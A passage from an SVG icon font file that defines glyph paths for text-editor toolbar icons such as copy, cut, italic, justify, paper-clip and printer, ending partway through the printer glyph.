<glyph glyph-name="color-picker" horiz-adv-x="1000" unicode="&#xede8;" d="M1000 708c-2-3-1-6-2-9-5-26-17-48-35-66l-45-45c-29-29-58-58-88-88 0-1-1-1-2-2-3-4-3-4-7-1-8 7-17 14-26 21-22 17-45 35-68 53-1 1-1 2-3 2 1-2 3-3 4-5 42-42 84-84 126-126 9-9 14-19 16-32 5-28-14-55-41-62-21-5-38 0-53 15-13 12-26 25-38 37-1 1-2 2-2 3-1 1-2 1-3 0-1-1-2-3-3-4-152-151-304-303-455-455-14-13-30-24-48-31-12-4-25-6-38-7-12-1-24-3-35-5-6 0-12-1-17-2-7-1-12-3-17-8-9-10-20-20-29-30-5-4-10-8-16-10-1 0-1 0-2-1h-10c-1 0-1 1-2 1-6 2-12 6-16 10-11 12-23 23-34 34-4 4-8 9-9 15-1 1-1 2-2 3v9c1 1 1 2 2 3 1 6 5 10 9 15 10 10 21 20 31 31 4 4 6 8 7 14 2 15 4 30 6 45 1 7 1 14 2 20 4 29 16 53 36 73 14 14 28 27 41 41l415 415c5 5 5 5 0 10-12 12-24 24-36 37-19 19-22 49-6 71 19 28 60 32 84 8 13-13 26-26 39-38l2-3c1-1 2-1 3 0 0 1 1 2 2 3 49 48 97 97 145 145 18 18 40 30 64 35 71 15 133-29 150-90 1-6 3-11 3-16 0-1 0-2 1-3 0-10 0-20 0-30z m-324-258c0 8-3 15-8 20-16 16-32 32-48 48-7 7-15 9-25 7-6-1-11-5-16-9-58-59-117-118-176-176-86-86-171-172-257-258l-3-3c-1-1-2-2-3-4-1-3-1-6 1-8 3-2 6-2 8 0 3 0 4 2 6 4l54 54c37 38 75 75 113 113 13 13 30 13 43 0 6-6 12-12 17-18 6-5 12-11 18-17 7-7 15-9 24-8 7 1 13 5 17 10 75 75 150 149 225 224 1 1 2 2 2 3 5 5 8 11 8 18z" />
<glyph glyph-name="copy-invert" horiz-adv-x="1000" unicode="&#xede9;" d="M749 553c-40 39-79 78-119 117-9 9-19 13-32 13-164 0-327 0-491 0-24 0-36-13-36-37v-758c0-27 10-38 37-38 44 0 88 0 133 0h484c28 0 37 10 37 37 0 211 0 422 0 633 1 13-3 23-13 33z m-509-127c46 0 91 0 136 0 9 0 15-3 15-11 0-10-6-13-15-13-23 1-46 0-69 0-22 0-45 1-67 0-8 0-15 2-15 12s7 12 15 12z m366-371c-1-7-6-9-12-9-19-1-37-1-55-1l-293 1c-3 0-6-1-9 0-8 0-12 4-12 12 0 7 5 11 12 11 21 0 41 0 62 0h118v0h171c5 0 9 1 13-2 5-3 6-8 5-12z m-13 109c-24-1-47 0-70 0h-109v0h-172c-9 0-17 1-17 11-1 8 5 13 17 13h347c7 0 15-1 17-9 2-9-3-15-13-15z m1 119c-31-1-61 0-91 0h-255c-3 0-6-1-9-1-8 1-14 3-14 12 0 10 6 12 14 12l121 0h57v0h174c5 0 11 0 14-6 5-8-1-17-11-17z m335 88c0 105 0 210 0 315 0 14-4 25-14 35-38 37-76 74-114 112-12 12-24 17-41 17-145 0-291 0-437 0-17 0-34 0-51 0-23-1-34-12-34-34-1-19 0-38 0-57 0-6 2-9 8-9 11 1 22 1 32 1 20 0 19 0 20 19 0 21-4 20 20 20 94 0 187 0 280 0 48 0 95 0 143 0 10 0 14-2 13-13-1-26 0-53 0-79 0-16 6-22 22-22 27 0 54 0 81 0 10 1 12-3 12-12 0-63 0-126 0-189 0-123 0-247 0-370 0-27 0-27-27-27-1 0-2 0-2 0-7 0-9-2-9-9 0-14 0-29 0-43 0-6 2-9 8-9 20 0 41 0 61 1 17 0 27 11 29 29 0 3 0 7 0 11 0 104 0 209 0 313z" />
<glyph glyph-name="copy" horiz-adv-x="1000" unicode="&#xedea;" d="M749 553c-40 39-79 78-119 117-9 9-19 13-32 13-163 0-327 0-491 0-24 0-36-12-36-37v-758c0-27 10-38 37-38 44 0 89 0 133 0h484c28 0 37 10 37 37 0 211 0 422 1 633 0 13-4 23-14 33z m-59-643c-180 0-360 0-540 0-23 0-19-2-19 19 0 112 0 225 0 337 0 114 0 229 0 344 0 10 3 13 13 13 99 0 199 0 298 0 43 0 86 0 129 0 16 0 16-1 16-17 0-24 0-48 0-73 0-19 6-24 25-24 27 0 53 0 80 0 8 0 11-2 11-11-1-110 0-220 0-330 0-82-1-163 0-245 0-10-3-13-13-13z m239 461c0 105 0 210 0 315 0 14-4 25-14 35-38 37-76 74-114 112-12 12-24 17-41 17-145 0-291 0-437 0-17 0-34 0-51 0-23-1-34-12-34-34 0-19 0-38 0-57 0-6 2-9 8-8 11 0 22 0 32 0 20 0 19 0 20 19 0 21-4 20 20 20 93 0 187 0 280 0 48 0 95 0 143 0 10 0 13-2 13-13-1-26 0-53 0-79 0-16 6-22 22-22 27 0 54 0 81 0 10 1 12-3 12-12 0-63 0-126 0-189 0-123 0-247 0-370 0-27 0-27-27-27-1 0-2 0-3 0-6 0-8-2-8-9 0-14 0-29 0-43 0-6 2-9 8-9 20 0 40 0 60 1 18 0 28 11 30 29 0 3 0 7 0 11 0 104 0 209 0 313z m-328-304c-4 3-8 2-13 2h-171v0h-118c-21 0-41 0-62 0-7 0-12-4-12-11 0-8 4-12 12-12 3-1 6-1 9-1 97 0 195 0 293 0 18 0 36 0 55 1 6 0 11 2 12 8 1 6 0 10-5 13z m-12 120c-116 0-231 0-347 0-12 0-18-4-17-12 0-10 8-11 17-11 57 0 115 0 172 0v-1h109c23 0 46 0 70 1 10 0 15 6 13 14-2 9-10 9-17 9z m2 119h-174v0h-57l-121 0c-8 0-14-2-14-11 0-10 6-12 14-12 3 0 6 0 9 0h255c30 0 61 0 91 0 10 0 16 9 11 17-3 6-9 6-14 6z m-351 96c22 1 45 0 67 0 23 0 46 1 69 0 9 0 15 3 15 13 0 8-6 11-15 11l-136 0c-8 0-15-2-15-12 0-10 7-12 15-12z" />
<glyph glyph-name="cut" horiz-adv-x="1000" unicode="&#xedeb;" d="M165 62c67 17 112 89 95 156-6 23-2 30 21 37 113 39 226 77 339 116 107 36 215 73 322 110 19 6 38 14 58 18v4c-13 28-37 42-65 51-39 12-80 14-121 10-46-4-88-23-129-42-79-36-154-80-229-122-69-38-139-73-214-95-19-6-37-5-55 3-35 17-72 19-108 3-52-23-83-77-78-132 5-52 38-95 86-112 34-12 72-6 78-5z m256 288c1 12 11 23 23 22 12 0 22-10 22-23 0-12-11-22-23-22-12 1-22 11-22 23z m-291-236c-43 1-76 37-74 79 2 42 37 75 78 74 42-2 76-38 74-78-2-44-36-77-78-75z m375 201c-15-5-31-10-48-16 2-2 3-2 4-3 80-44 160-89 243-127 67-31 136-44 209-29 36 8 70 20 87 56v4c-4-1-8 2-11 3-35 12-70 24-104 35-98 34-196 67-294 100-6 3-12 3-18 0-23-8-45-15-68-23z m-88 82c-5 2-8 3-11 4-43 15-87 30-131 45-15 5-20 15-16 30 24 92-52 177-145 164-52-8-87-37-105-85-18-48-9-94 25-133 33-39 91-60 152-31 19 9 37 10 56 4 31-10 61-21 91-34 3-1 6-3 11-1 23 12 48 23 73 37z m-361 113c0 42 34 76 76 76 42 0 77-36 76-77 0-42-35-77-76-76-42 0-76 35-76 77z" />
<glyph glyph-name="delete-alt" horiz-adv-x="1000" unicode="&#xedec;" d="M989 809c-9 11-21 16-35 17-5 1-10 1-15 1h-878c-39 0-48-7-61-43v-97c4-13 8-25 19-33 9-6 18-9 28-9 7 1 10-2 11-8 22-135 45-269 67-403 12-69 23-139 35-209 8-44 26-83 60-114 21-19 59-37 79-37h404c17 0 33 8 48 16 44 24 70 62 83 109 12 46 17 93 25 140 18 108 36 215 54 323 10 58 20 116 29 173 1 7 3 10 11 11 25 1 39 12 45 37 1 1 1 3 2 4v97c-3 8-5 17-11 25z m-453-198c2 1 5 4 6 6 3 4 6 7 9 10h115c3-3 5-6 8-9 6-7 13-14 20-20 4-4 5-7 0-11-23-23-45-45-68-68-4-5-7-4-11 0-26 27-53 53-79 80-5 5-5 8 0 12z m-122-368c26 25 52 51 77 77 5 5 8 6 14 0 25-26 52-52 78-78 5-4 5-7 0-12-27-26-53-53-79-79-2-2-4-4-6-5-2 2-5 4-6 6-26 26-52 52-79 77-5 6-4 9 1 14z m-33 31c-5-5-7-5-12 0-26 26-52 53-79 79-4 4-5 7 0 12 27 26 53 53 79 79 5 4 7 5 11 1 27-27 54-54 81-81 1-2 3-3 4-5-1-2-3-4-4-6-27-26-54-53-80-79z m155 79c-5 5-5 7 0 12 27 26 53 53 80 79 3 4 5 6 10 1 27-27 54-54 81-81 1-2 2-3 3-4 1-3-2-5-3-6-27-27-54-54-81-81-4-4-6-4-11 0-26 27-53 54-79 80z m-32 214c26-27 53-53 80-80 3-3 5-5 1-10-28-27-55-55-83-82-1-1-3-2-4-4-3 3-5 4-7 6-26 26-51 52-78 78-5 5-5 8 0 13 27 26 53 52 79 79 4 4 7 5 12 0z m-201 32c10 9 19 19 28 28h114c3-3 6-6 8-9 12-14 13-13 1-26-24-24-48-48-72-72-5-4-8-6-13 0-22 22-44 44-66 66-6 5-5 8 0 13z m-36 28c-2-1-3-1-5 0h5z m-98-96c-3 1-3 5-3 8-5 29-10 59-15 88h47c9-9 18-19 28-28 5-5 6-8 0-13-17-17-33-34-50-51-2-2-4-6-7-4z m14-52c25 25 50 50 75 75 5 5 7 6 12 1 23-23 45-45 68-68 1-1 3-3 4-5-1-2-3-4-4-6-27-26-54-53-80-80-4-4-7-4-11 0-21 22-43 43-64 64-7 7-7 12 0 19z m17-137c-4 1-3 10-4 16-2 9-3 18-4 27l2 1c8-8 15-16 23-24 5-5-1-7-3-9-5-5-8-13-14-11z m23-147c-3 26-8 51-13 76 0 3 0 5-1 8 0 4 2 6 4 9 12 11 23 22 34 33 4 5 6 5 11 1 26-27 53-54 80-81 4-4 4-6 0-10-27-27-54-54-81-82-4-3-6-3-9 0-15 13-23 26-25 46z m118-207c-8-8-15-16-24-23-1-1-4 0-4 0-18 1-30 9-40 21-16 20-23 44-27 70 0 4-1 9-2 13 0 5 4 8 7 10 3 2 5-1 6-3 28-27 55-54 82-81 1-2 5-4 2-7z m28 40c-26 26-52 53-79 79-4 4-5 7 0 12 27 26 53 53 80 79 1 2 3 3 5 5 2-1 4-3 5-4 27-27 54-54 81-81 4-4 4-7 0-11-27-26-54-53-80-79-5-5-8-4-12 0z m214-44c-12-16-27-23-47-20-12 1-26 0-39 0s-26 1-39 0c-18-2-31 4-43 17-6 7-7 10 0 17 26 25 51 50 76 76 5 6 9 6 14 0 26-26 52-52 78-77 4-5 5-8 0-13z m32 44c-26 27-53 53-79 79-4 4-6 6-1 11 27 27 54 54 82 82 1 1 2 2 4 3 2-1 4-3 5-5 27-26 53-52 80-78 4-5 5-8 0-13-27-26-53-53-79-79-5-5-8-4-12 0z m140 38c-4-29-8-58-28-81-11-13-24-20-41-21-9-1-13 6-19 12-14 14-14 14 0 28 23 24 47 47 70 70 2 2 4 8 8 5 4-3 11-6 10-13z m35 208c-5-31-9-64-17-96-3-13-18-21-28-31-3-3-4 1-6 3-27 27-54 54-81 80-4 5-4 7 0 11 27 27 54 53 80 80 5 5 8 5 12 0 12-12 24-24 36-36 2-3 5-5 4-11z m11 68c0-5-3-6-6-2 0 0-1 0-1 1-19 17-19 17-1 35 4 5 8 10 13 15l3-2c-2-16-5-32-8-47z m16 122c-22-23-45-45-68-68-4-5-7-4-11 0-26 27-53 54-80 80-5 5-3 8 1 12 22 22 45 44 67 67 4 4 6 5 11 0 27-27 53-53 80-80 1-2 3-3 5-5-2-2-3-4-5-6z m15 60c-23 23-43 43-64 64-4 3-3 6 0 9 10 10 20 20 30 30h51c-6-33-11-67-17-103z" />
<glyph glyph-name="edit-alt" horiz-adv-x="1000" unicode="&#xeded;" d="M0-140c11-10 22-11 36-5 33 16 66 29 99 44 22 10 25 21 8 38-18 19-37 37-55 56-17 16-27 14-37-8-17-37-34-75-51-112v-13z m284 356c2-2 5-5 7-7 20-21 41-40 60-61 9-9 13-6 21 1 138 139 277 277 415 415 10 10 8 15 0 23-20 18-38 36-56 55-10 12-16 10-26 0-82-83-165-166-248-249-54-54-107-107-161-161-4-4-11-8-12-16z m-103 43c-32-73-63-143-94-214-4-9 0-13 5-18 29-29 57-57 85-85 7-8 13-9 23-5 65 29 130 58 196 86 10 4 14 8 4 17-72 72-144 144-219 219z m498 491c1-7 6-12 10-17 65-65 130-129 195-194 12-13 23-13 35-1 24 25 48 49 73 73 11 11 11 21 0 32-66 66-132 131-198 197-10 11-21 11-32 1-25-25-49-50-74-74-5-5-8-10-9-17z m-278-651c12-13 23-26 36-35 9-6 13 6 18 11 136 135 271 271 407 406 13 13 12 19 0 31-25 23-25 24-49 0-132-133-265-265-397-398-5-4-9-9-15-15z m-189 191c7-12 17-21 27-29 8-5 11 5 15 9 138 137 275 275 413 411 15 15 5 20-4 29-8 8-14 19-28 4-137-138-275-275-412-413-4-3-7-7-11-11z" />
<glyph glyph-name="eraser-alt" horiz-adv-x="1000" unicode="&#xedee;" d="M413 274c-24 24-49 48-73 72-16 17-36 18-49 4-15-14-13-34 3-50l146-146c21-21 48-18 58 6 5 15 1 27-10 38-25 25-50 51-75 76z m561 268l-291 291c-22 22-58 22-80 0l-463-463c-82-82-82-215 0-297l74-74c82-82 215-82 297 0l463 464c22 21 22 57 0 79z m-388-401l-76-77c-82-82-215-82-297 0l-8 8c-82 82-82 215 0 297l77 77c16 15 41 15 57 0l247-248c16-15 16-41 0-57z m-269-244h-270c-13 0-23-11-23-23s10-24 23-24h270c13 0 23 11 23 24s-10 23-23 23z" />
<glyph glyph-name="font" horiz-adv-x="1000" unicode="&#xedef;" d="M90-38c24 63 47 126 70 189 71 190 143 380 213 570 3 8 7 11 16 11 46 0 92 0 139 0 8 0 11-2 14-10 67-181 135-361 202-542 2-4 2-8 6-11 10 26 20 52 30 77 6 18 13 35 19 52 2 6 5 8 12 8 17 0 35-1 53 0 8 0 11-3 13-10 39-106 79-212 119-317 1-4 3-7 4-10 0-4 1-7-5-7-20 1-40 0-60 0-8 24-16 48-24 72-2 6-5 9-12 9-31-1-62-1-94 0-8 0-9-3-6-10 9-23 17-47 26-71h-210c-14 44-29 87-43 130-2 7-6 9-13 9-83 0-165 0-248 0-8 0-11-3-14-10-15-43-30-86-45-129h-162z m346 558c-2-4-2-5-3-5-28-86-55-171-83-257-3-9 2-8 8-8 51 0 101 0 152 0 9 0 11 2 8 11-20 59-38 119-57 179-8 26-16 52-25 80z m402-276c-1 0-1 0-2-1-18-49-36-99-53-149-3-7 1-7 6-7 32 0 63 1 95 0 7 0 8 2 6 8-8 22-15 44-23 65-9 28-19 56-29 84z m-817-282c-22 11-25 20-16 44 88 236 176 472 265 708 0 2 1 4 2 6 6 14 19 21 32 16 14-5 21-19 15-34-11-31-23-62-35-93-77-206-154-412-231-619-5-13-11-24-26-28-2 0-4 0-6 0z" />
<glyph glyph-name="heading" horiz-adv-x="1000" unicode="&#xedf0;" d="M905 763c5 16 15 26 28 32 14 6 36 9 67 11v27c-45-3-114-4-207-4-93 0-164 1-215 4v-27c31-2 53-5 67-11s23-16 28-32c5-15 8-40 8-75v-272h-362v272c0 35 3 60 8 75 4 16 14 26 27 32 14 6 36 9 67 11v27c-48-3-117-4-206-4-97 0-169 1-215 4v-27c30-2 52-5 66-11 14-6 23-16 28-32 5-15 8-40 8-75v-676c0-35-3-60-8-75-5-16-14-26-28-32-14-6-36-9-66-11v-27c46 3 118 4 215 4 89 0 158-1 206-4v27c-31 2-53 5-67 11-13 6-23 16-28 32-4 15-7 40-7 75v280h362v-280c0-35-3-60-8-75-5-16-14-26-28-32s-37-9-67-11v-27c51 3 122 4 215 4 93 0 162-1 207-4v27c-31 2-53 5-67 11-13 6-23 16-28 32-5 15-8 40-8 75v676c0 35 3 60 8 75z" />
<glyph glyph-name="indent" horiz-adv-x="1000" unicode="&#xedf1;" d="M26 171c192 0 385 0 578 0 1 0 2 0 3 0 6 1 10 3 14 9 4 5 6 12 8 20v85c0 0 0 1 0 1-4 20-12 28-25 28h-579c-1 0-2 0-3 0-12 0-22-16-22-35 0-24 0-48 0-72 0-9 2-16 5-23 6-10 12-13 21-13z m-25 458c2-15 17-29 36-29 308 0 617 0 925 0h3c8 0 15 3 21 8 7 5 11 13 14 21v84c-3 10-8 18-17 24-5 3-11 5-16 6h-934c-1 0-1-1-2-1-19-3-31-17-31-37 0-23 0-46 0-68 0-3 0-6 1-8z m-1-215c3-17 12-29 23-29h556c9 0 18 0 28 0 5 0 10 3 14 9 4 6 7 13 8 21v84c0 0 0 1 0 1-4 20-12 28-25 28h-579c-1 0-3 0-4 0-12-1-21-16-21-36 0-23 0-47 0-71 0-2 0-5 0-7z m955-314h-914c-2 0-3 0-5 0-21 0-36-16-36-36 0-24 0-47 0-71 0-10 4-18 10-25 8-9 19-11 31-11 306 0 612 0 918 0 2 0 5 0 7 0 10 0 18 5 25 13 4 4 6 10 9 16v84c-10 24-19 30-45 30z m-215 426c-12 7-26-2-26-17v-317c0-15 14-24 26-16l251 158c12 8 12 26 0 33l-251 159z" />
<glyph glyph-name="italic-alt" horiz-adv-x="1000" unicode="&#xedf2;" d="M506-69c0-14 3-25 9-32 6-7 16-12 29-15s33-5 57-6l-6-28c-54 3-131 4-229 4-99 0-173-1-222-4l6 28c33 2 58 5 74 11 17 6 30 17 40 34 10 16 20 41 29 76l186 701c8 30 12 53 12 69 0 13-3 24-9 31s-16 13-29 16-32 5-56 6l7 28c46-3 120-4 221-4 94 0 171 1 232 4l-7-28c-35-2-60-5-77-11-17-6-30-17-40-33-10-17-20-42-29-78l-186-700c-8-33-12-56-12-69z" />
<glyph glyph-name="italic" horiz-adv-x="1000" unicode="&#xedf3;" d="M803 665l16 105c2 10-5 18-14 18h-484c-10 0-19-8-20-18l-17-105c-1-9 5-17 15-17h128c10 0 16-7 15-17l-81-562c-1-10-10-17-19-17h-124c-10 0-19-8-20-17l-17-106c-1-9 5-17 15-17h484c10 0 19 8 20 17l17 106c1 9-6 17-15 17h-140c-9 0-16 7-15 17l81 562c1 9 10 17 20 17h135c9 0 18 8 20 17z" />
<glyph glyph-name="justify-all" horiz-adv-x="1000" unicode="&#xedf4;" d="M1000 200c-3-8-6-15-13-21-6-5-13-8-22-8-2 0-4 0-6 0-306 0-612 0-918 0-13 0-24 3-32 13-6 6-9 14-9 22 0 25 0 49 0 73 0 19 16 35 35 35 2 0 3 0 5 0h920c21 0 33-8 39-28 0-1 1-1 1-1v-85z m0 429c-3-8-7-16-14-21-6-5-13-8-21-8h-3c-308 0-616 0-925 0-19 0-34 14-36 29-1 2-1 5-1 8 0 22 0 45 0 68 0 20 12 34 31 37 1 0 1 1 2 1h934c6-1 12-3 17-6 8-6 13-14 16-24v-84z m0-214c-2-8-6-15-13-21-6-6-14-9-23-9-15 0-29 0-44 0h-883c-18 0-32 12-36 29-1 2-1 5-1 7 0 24 0 48 0 71 0 19 15 35 33 36 3 0 5 0 7 0h920c21 0 33-8 39-28 0-1 1-1 1-1 0-28 0-56 0-84z m0-429c-2-6-4-12-9-17-7-7-14-12-25-12-2 0-4 0-7 0-306 0-612 0-918 0-12 0-23 2-31 11-6 7-10 15-10 25 0 23 0 47 0 70 0 21 15 36 36 37 2 0 3 0 5 0h915c26 0 35-6 44-30v-84z" />
<glyph glyph-name="justify-center" horiz-adv-x="1000" unicode="&#xedf5;" d="M999 286c-6 20-18 28-39 28h-920c-2 0-3 0-5 0-19 0-35-16-35-35 0-24 0-48 0-73 0-8 3-16 9-22 8-10 19-13 32-13 306 0 612 0 918 0 2 0 4 0 6 0 9 0 16 3 22 8 7 6 10 13 13 21v85c0 0-1 0-1 1z m-998 343c2-15 17-29 36-29 309 0 617 0 925 0h3c8 0 15 3 21 8 7 5 11 13 14 21v84c-3 10-8 18-16 24-5 3-11 5-17 6h-934c-1 0-1-1-2-1-19-3-31-17-31-37 0-23 0-46 0-68 0-3 0-6 1-8z m959-101h-920c-2 0-4 0-7 0-18-1-33-17-33-36 0-23 0-47 0-71 0-2 0-5 1-7 4-17 18-29 36-29h883c15 0 29 0 44 0 9 0 17 3 23 9 7 6 11 13 13 21v84c0 0-1 0-1 1-6 20-18 28-39 28z m-187-428h-548c-1 0-2 0-3 0-12-1-22-16-22-37 0-23 0-47 0-70 0-10 2-18 6-25 5-9 12-11 19-11 183 0 367 0 550 0 2 0 3 0 4 0 7 0 11 5 15 12 3 5 4 11 6 17v84c-6 24-11 30-27 30z" />
<glyph glyph-name="justify-left" horiz-adv-x="1000" unicode="&#xedf6;" d="M960 314h-920c-2 0-3 0-5 0-19 0-35-16-35-35 0-24 0-48 0-73 0-8 3-16 9-22 8-10 19-13 32-13 306 0 612 0 918 0 2 0 4 0 6 0 9 0 16 3 22 8 7 6 10 13 13 21v85c0 0-1 0-1 1-6 20-18 28-39 28z m24 423c-6 3-11 5-17 6h-934c-1 0-1-1-2-1-19-3-31-17-31-37 0-23 0-46 0-68 0-3 0-6 1-8 2-15 17-29 36-29 309 0 617 0 925 0h3c8 0 15 3 21 8 7 5 11 13 14 21v84c-3 10-8 18-16 24z m-24-209h-920c-2 0-4 0-7 0-18-1-33-17-33-36 0-23 0-47 0-71 0-2 0-5 1-7 4-17 18-29 36-29h883c15 0 29 0 44 0 9 0 17 3 23 9 7 6 11 13 13 21v84c0 0-1 1-1 1-6 20-18 28-39 28z m-387-428h-548c-1 0-2 0-3 0-13-1-22-16-22-37 0-23 0-47 0-70 0-10 2-18 6-25 5-9 11-11 19-11 183 0 366 0 550 0 1 0 3 0 4 0 6 0 11 5 15 12 3 5 4 11 5 17v84c-5 24-11 30-26 30z" />
<glyph glyph-name="justify-right" horiz-adv-x="1000" unicode="&#xedf7;" d="M40 314h920c2 0 3 0 5 0 19 0 35-16 35-35 0-24 0-48 0-73 0-8-3-16-8-22-9-10-20-13-32-13-307 0-613 0-919 0-2 0-4 0-6 0-8 0-16 3-22 8-6 6-10 13-13 21v85c0 0 1 0 1 1 6 20 18 28 39 28z m-23 423c5 3 10 5 16 6h934c1 0 1-1 2-1 19-3 31-17 31-37 0-23 0-46 0-68 0-3 0-6-1-8-2-15-17-29-36-29-308 0-617 0-925 0h-3c-8 0-15 3-21 8-7 5-11 13-14 21v84c3 10 8 18 17 24z m23-209h920c2 0 5 0 7 0 19-1 33-17 33-36 0-23 0-47 0-71 0-2 0-5-1-7-3-17-18-29-36-29h-883c-15 0-29 0-44 0-9 0-16 3-23 9-7 6-10 13-13 21v84c0 0 1 1 1 1 6 20 18 28 39 28z m387-428h548c1 0 3 0 4 0 12-1 21-16 21-37 0-23 0-47 0-70 0-10-2-18-6-25-5-9-11-11-18-11-184 0-367 0-551 0-1 0-3 0-4 0-6 0-11 5-15 12-3 5-4 11-5 17v84c5 24 11 30 26 30z" />
<glyph glyph-name="link-broken" horiz-adv-x="1000" unicode="&#xedf8;" d="M998 572c-5 49-29 89-63 122-74 73-186 88-277 38l-121-65c-28-16-56-30-83-47-19-12-27-31-23-53 4-23 18-38 41-44 17-5 31 0 45 8 62 33 123 68 185 100 52 26 111 14 150-30 15-17 27-38 24-62-6-49-26-89-72-114-40-21-80-43-119-64-23-13-46-25-68-38-19-12-28-35-23-55 9-39 47-56 83-37 65 35 130 71 195 106 60 33 99 83 117 149 5 17 7 35 11 53v29c0 1-1 3-2 4z m-417-380c-24 11-47 5-66-16-46-50-92-101-138-151-39-43-94-55-146-32-24 11-47 26-53 53-13 49-7 95 30 134 30 33 60 66 90 99 18 20 37 39 54 60 19 24 11 61-15 78-23 15-52 11-73-12-50-55-100-109-150-164-23-25-40-54-50-86-14-42-14-84-7-127 4-28 13-54 31-76 47-60 109-90 180-92 68 1 124 22 168 68 52 54 101 109 151 164 5 6 11 13 16 19 20 28 9 67-22 81z m-259 58c-21-24-25-53-12-77 22-43 75-49 109-13 83 88 164 176 246 265 13 13 20 29 20 46 0 37-30 68-66 67-22-1-39-10-53-26-63-67-125-135-188-202-19-20-38-40-56-60z m-59 224v0c5 0 10 0 15 0 18 0 28 17 22 33-4 7-10 12-17 15-75 37-150 74-225 111-18 9-20 8-29-10-1-2-2-4-3-7-11-24-17-50-22-76-3-13-5-26-4-39 1-8 4-11 12-12 22-1 45-2 67-4 61-4 123-7 184-11z m72 185c4-21 9-42 14-63 3-12 10-19 21-18 11 0 18 7 21 19 0 1 0 2 1 3 13 74 26 147 40 221 2 9-1 13-10 15-17 4-34 4-51 4-20 0-41-1-60-6-12-3-13-6-10-17 11-53 22-105 34-158z m-235 77c42-29 84-59 126-88 9-7 18-14 28-19 11-6 22 0 23 12-1 4-3 8-6 12-33 49-67 97-100 146-4 6-8 8-15 4-24-12-43-29-59-51-5-7-4-11 3-16z" />
<glyph glyph-name="outdent" horiz-adv-x="1000" unicode="&#xedf9;" d="M975 171c-193 0-386 0-579 0-1 0-2 0-3 0-5 1-10 3-14 9-4 5-6 12-8 20v85c0 0 0 1 0 1 4 20 12 28 25 28h579c1 0 2 0 3 0 12 0 22-16 22-35 0-24 0-48 0-72 0-9-2-16-5-23-6-10-12-13-20-13z m24 458c-2-15-17-29-36-29-308 0-616 0-925 0h-2c-9 0-16 3-22 8-7 5-11 13-14 21v84c3 10 8 18 17 24 5 3 11 5 16 6h934c1 0 1-1 2-1 19-3 31-17 31-37 0-23 0-46 0-68 0-3 0-6-1-8z m1-215c-3-17-12-29-23-29h-556c-9 0-18 0-27 0-6 0-11 3-15 9-4 6-7 13-8 21v84c0 0 0 1 0 1 4 20 12 28 25 28h579c1 0 3 0 4 0 12-1 21-16 21-35 0-24 0-48 0-72 0-2 0-5 0-7z m-955-314h914c2 0 3 0 5 0 21 0 36-16 36-36 0-24 0-47 0-71 0-10-3-18-10-25-8-9-19-11-31-11-306 0-612 0-918 0-2 0-5 0-7 0-10 0-18 5-25 13-4 4-6 10-9 16v84c10 24 19 30 45 30z m215 426c12 7 26-2 26-17v-317c0-15-14-24-26-16l-251 158c-12 8-12 26 0 33l251 159z" />
<glyph glyph-name="paper-clip" horiz-adv-x="1000" unicode="&#xedfa;" d="M724 850c16-3 32-3 48-6 110-19 205-113 223-223 17-102-13-189-86-261-70-70-139-141-209-210-49-48-108-62-173-42-66 21-106 68-118 136-10 56 7 107 47 148 53 55 108 109 162 164 17 17 34 17 51 0 13-13 26-26 39-39 15-16 15-34 0-49-32-32-64-65-96-97-22-22-43-43-64-65-20-20-21-49-2-67 19-19 47-18 67 2 73 73 147 146 219 220 41 43 52 95 36 151-17 57-56 94-115 107-55 13-104-2-144-42-145-145-290-289-435-435-44-44-58-97-40-156 18-59 59-96 120-108 56-10 103 8 143 47 15 16 31 31 47 47 16 15 34 15 49 0 14-14 29-28 42-42 12-13 14-31 2-43-31-30-59-62-95-87-44-31-94-47-149-50-138-6-264 91-288 236-3 14-3 28-5 42v6c3 3 1 6 2 9 3 70 28 131 77 182 38 40 78 78 116 117 110 109 220 220 330 329 39 39 87 62 141 73 16 3 32 3 48 6 3 0 6 0 10 0z" />
<glyph glyph-name="paragraph" horiz-adv-x="1000" unicode="&#xedfb;" d="M533 269v-397c0-19-2-22-21-22-43 0-87 0-130 0-15 0-19 5-19 19 0 114 0 229 0 343 0 10-1 14-13 16-137 16-247 124-269 261-24 151 69 301 213 346 36 11 73 15 110 15l494 0c22 0 24-2 24-24 0-42 0-85 0-128 0-16-3-18-18-18-33-1-66-1-99 0-9 0-11-3-11-12 1-91 0-181 0-272 0-115 0-229 1-344 0-60 0-120 0-180 0-19-4-22-23-22-43 0-86 0-129 0-14 0-19 4-19 19 0 118 0 236 0 353v415c0 12 0 23 0 35 0 6-2 8-8 8-24-1-48-1-72 0-8 0-11-2-11-11 1-82 0-165 0-247 0-51 0-102 0-153z" />
<glyph glyph-name="pin" horiz-adv-x="1000" unicode="&#xedfc;" d="M557 844c-19 4-38 6-57 6-19 0-38-2-57-6-166-32-280-188-258-353 23-163 157-281 315-281 159 0 293 118 315 281 22 165-92 321-258 353z m-57-537c-122 0-220 97-221 221-2 122 96 223 218 224h3s2 0 3 0c122-1 220-102 218-224-1-123-99-221-221-221z m-143-89c48-127 94-243 142-368 49 126 95 243 144 368-96-38-186-40-286 0z m141 478c-91-1-163-73-165-165-1-91 73-167 165-168 92 0 167 75 167 167-1 92-75 167-167 166z m2-216c-31 2-50 19-50 49-1 29 16 49 48 50 31 0 49-19 50-48 1-30-17-48-48-51z" />
<glyph glyph-name="printer" horiz-adv-x="1000" unicode="&#xedfd;" d="M506 587h448c12 0 23 0 33-6 8-6 13-12 13-23 0-54 0-107 0-161 0-68 0-137 0-205 0-16 0-16-16-16-35 0-70 0-105-1-12 0-15 3-15 15 0 63 0 126 0 190 0 14-2 16-16 16-228 0-455 0-683 0 0 0-1 0-2 0-10 0-14-3-14-14 1-47 0-93 0-140 0-18 0-35 1-53 0-10-4-13-14-13-41 0-82 0-124 0-9-1-12 3-12 12 0 116 0 232 0 348 1 31 22 51 53 51 151 0 302 0 453 0v0z m59-96v0c103 0 206 0 309 1 37 0 31-6 32 31 0 15-2 16-17 16-211 0-423 0-635 0-30 0-30 1-31-29 0-19 0-19 18-19h324z m-425 54c-22 0-38-17-38-39 1-23 17-39 39-39 27 2 39 19 39 41 0 18-13 38-40 37z m366 265c89 0 178 0 267 0 16 0 17-1 17-16 0-44 0-89 0-133 0-11-3-15-14-15-180 0-359 0-539 0-11 0-14 3-14 14 1 45 0 90 0 135 0 11 2 16 14 16 90-1 180-1 269-1z m3-920c-78 0-156-1-234 0-39 0-59 21-60 58-1 125 0 250 0 376 0 11 4 14 14 14 15-1 30-2 45-1 11 1 13-3 13-13-1-117 0-235-1-353 0-11 3-14 15-14 136 0 272 0 408 0 15 0 15 0 15 16l1 349c0 15 0 15 15 15 16 0 31 0 47 0 7 0 10-2 10-10 